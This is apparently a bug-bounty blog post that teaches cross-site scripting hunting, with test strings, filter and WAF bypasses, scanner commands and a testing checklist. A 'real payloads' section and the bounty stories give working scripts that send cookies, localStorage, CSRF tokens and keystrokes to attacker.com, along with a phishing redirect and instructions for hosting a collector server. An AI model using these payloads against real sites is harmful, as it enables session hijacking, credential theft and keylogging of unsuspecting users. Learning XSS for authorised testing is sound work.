Post cover image

June 25, 2026

XSS The $5k Bug That Runs Code in Their Browser

XSS is the bug everyone thinks they understand. And most people get it wrong.

By cyber-ninjaaa

4 min read

You put <script>alert(1)</script> in a search box. You get an alert. You report it. You get $50.

That's not XSS hunting. That's XSS begging hahah.

Real XSS is about stealing sessions. Defacing pages. Phishing users. Bypassing CSRF tokens. Reading private data.

I've found XSS that stole admin cookies. XSS that let me change user passwords. XSS that redirected users to fake login pages. XSS that made users follow my commands.

Each one paid over $5k.

Here's how.

First, what is XSS?

XSS stands for Cross-Site Scripting.

Simple definition: You inject JavaScript into a website. That JavaScript runs in another user's browser.

Why is that bad? Because that JavaScript can do anything the user can do.

Steal their session cookie. Log their keystrokes. Redirect them to a fake site. Make requests on their behalf. Change their password. Post as them. Send messages as them.

You're not attacking the server. You're attacking the users.

None

The three types of XSS

Everyone knows there are three types. But nobody explains them clearly.

Reflected XSS

The script comes from the current request. Usually in a URL parameter. You send someone a malicious link. They click it. The script runs.

https://target.com/search?q=<script>alert(1)</script>

The server reflects your input in the response. The script executes in the user's browser.

Example: You share a link on social media. Someone clicks it. Their session is stolen.

Stored XSS

The script is stored on the server. In a comment. A profile field. A message. Anywhere.

Everyone who visits that page gets hit. No link needed. Just visiting the page triggers the script.

Example: You post a comment on a blog. The comment contains a script. Everyone who reads the blog gets hacked.

DOM-based XSS

The script never reaches the server. It's in the client-side JavaScript.

The URL contains a payload. The JavaScript on the page reads it and writes it to the DOM without sanitization.

Example: # fragment in a URL is read by JavaScript and written to the page.

None

How to spot XSS

The simple test

Find any input. Search box. URL parameter. Form field. Comment box. Message field. Name field. Bio field.

Type:

<script>alert(1)</script>

If you get an alert, you found XSS.

If not, try:

<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
" onmouseover=alert(1) "
None

The attribute test

Sometimes you're inside an HTML attribute.

<input value="YOUR_INPUT">

Your payload needs to break out of the attribute.

Try:

"><script>alert(1)</script>
" onmouseover=alert(1) "
" autofocus onfocus=alert(1) "
None

The JavaScript test

Sometimes you're inside a JavaScript context.

<script>
  var user = "YOUR_INPUT";
</script>

Your payload needs to break out of the string.

try

"; alert(1); //
"; fetch('http://attacker.com/steal?cookie='+document.cookie) //
None

The real payloads

<script>alert(1)</script> is for testing. It's not for stealing.

Here are the real payloads.

Steal cookies

<script>
  fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

Steal local storage

<script>
  fetch('http://attacker.com/steal?data=' + JSON.stringify(localStorage));
</script>

Redirect to phishing page

<script>
  window.location = 'http://attacker.com/fake-login';
</script>

Deface the page

<script>
  document.body.innerHTML = '<h1>Hacked by cyber-ninjaaa</h1>';
</script>

Keylogger

<script>
  document.addEventListener('keydown', function(e) {
    fetch('http://attacker.com/log?key=' + e.key);
  });
</script>

CSRF token theft

<script>
  fetch('/api/csrf-token').then(r => r.text()).then(token => {
    fetch('http://attacker.com/steal?token=' + token);
  });
</script>

The bypass techniques

Encoding bypass

<script>alert(1)</script>

Encoded:

%3Cscript%3Ealert(1)%3C/script%3E

HTML entities:

&lt;script&gt;alert(1)&lt;/script&gt;

Unicode:

\u003cscript\u003ealert(1)\u003c/script\u003e

Case bypass

<ScRiPt>alert(1)</sCrIpT>

Double tag bypass

<scr<script>ipt>alert(1)</scr</script>ipt>

Event handler bypass

<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>

JavaScript pseudo-protocol

<a href="javascript:alert(1)">Click me</a>
<iframe src="javascript:alert(1)">.

The WAF bypass that still works

Most WAFs are dumb. They block certain patterns. They don't understand context.

Try these.

<svg/onload=alert(1)>
<svg/onload=alert(1)//
<svg/onload=alert(1) >
<svg/onload=alert(1)/
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1) >
<body/onload=alert(1)>
<marquee/onstart=alert(1)>
<details/open/ontoggle=alert(1)>
None

The real bounties

Example one. Stored XSS in comments.

Blog platform. Comment box. Payload: "><script>fetch('http://attacker.com/steal?c='+document.cookie)</script>

Every visitor got their cookies stolen. Including admins. Account takeover of multiple users. $8k.

Example two. Reflected XSS in search.

E-commerce site. Search parameter reflected unsanitized. Payload: ?q=<script>window.location='http://attacker.com/fake-login'</script>

Sent the link to a user. They got redirected to a fake login page. Entered their credentials. Stolen. $7k.

Example three. DOM XSS in URL fragment.

Social platform. JavaScript read window.location.hash and wrote it to the page. Payload: #<img src=x onerror=alert(1)>

Visiting the link triggered the script. Stored nothing in logs. Hard to detect. $10k.

Example four. XSS in file name.

File upload. Filename displayed on page. Payload: "><script>alert(1)</script>.jpg

Uploaded the file. Visited the gallery. Script executed. $6k.

None

The tools I use

Burp Suite. Find inputs. Send payloads. Check responses.

XSStrike. Automated XSS scanner.

python3 xsstrike.py -u "https://target.com/search?q=test"

Dalfox. Fast XSS scanner.

dalfox url https://target.com/search?q=test

XSSHunter. Blind XSS detection. Creates an endpoint that catches callbacks.

Custom Python server. Host your keylogger or cookie collector.

python3 -m http.server 80

ngrok. Expose your server to the internet.

ngrok http 80
None

The checklist I actually use

Before I test any input, I run through this.

  • Find every input. URL params. Forms. Cookies. Headers. File uploads. JSON bodies.
  • Test <script>alert(1)</script>. Look for alerts.
  • Test attribute context. " onmouseover=alert(1) "
  • Test JavaScript context. "; alert(1); //
  • Test HTML context. <img src=x onerror=alert(1)>
  • Test encoding. URL encode. HTML encode. Unicode.
  • Test case variations. <ScRiPt>.
  • Test event handlers. onload, onerror, onfocus.
  • Test for stored XSS. Save payloads. Check later.
  • Test for DOM XSS. Check # fragment. window.location usage.

Ten checks. Twenty minutes. Pays thousands.

The mindset shift

Most people test XSS and stop at alert(1).

You need to think "what can I do with this?"

Steal cookies. Steal sessions. Redirect users. Deface pages. Phish credentials. Bypass CSRF.

XSS isn't just a popup. It's a foothold. A way to control the user's browser.

Don't just show an alert. Show impact.

What's the craziest XSS you've ever found? Drop it below.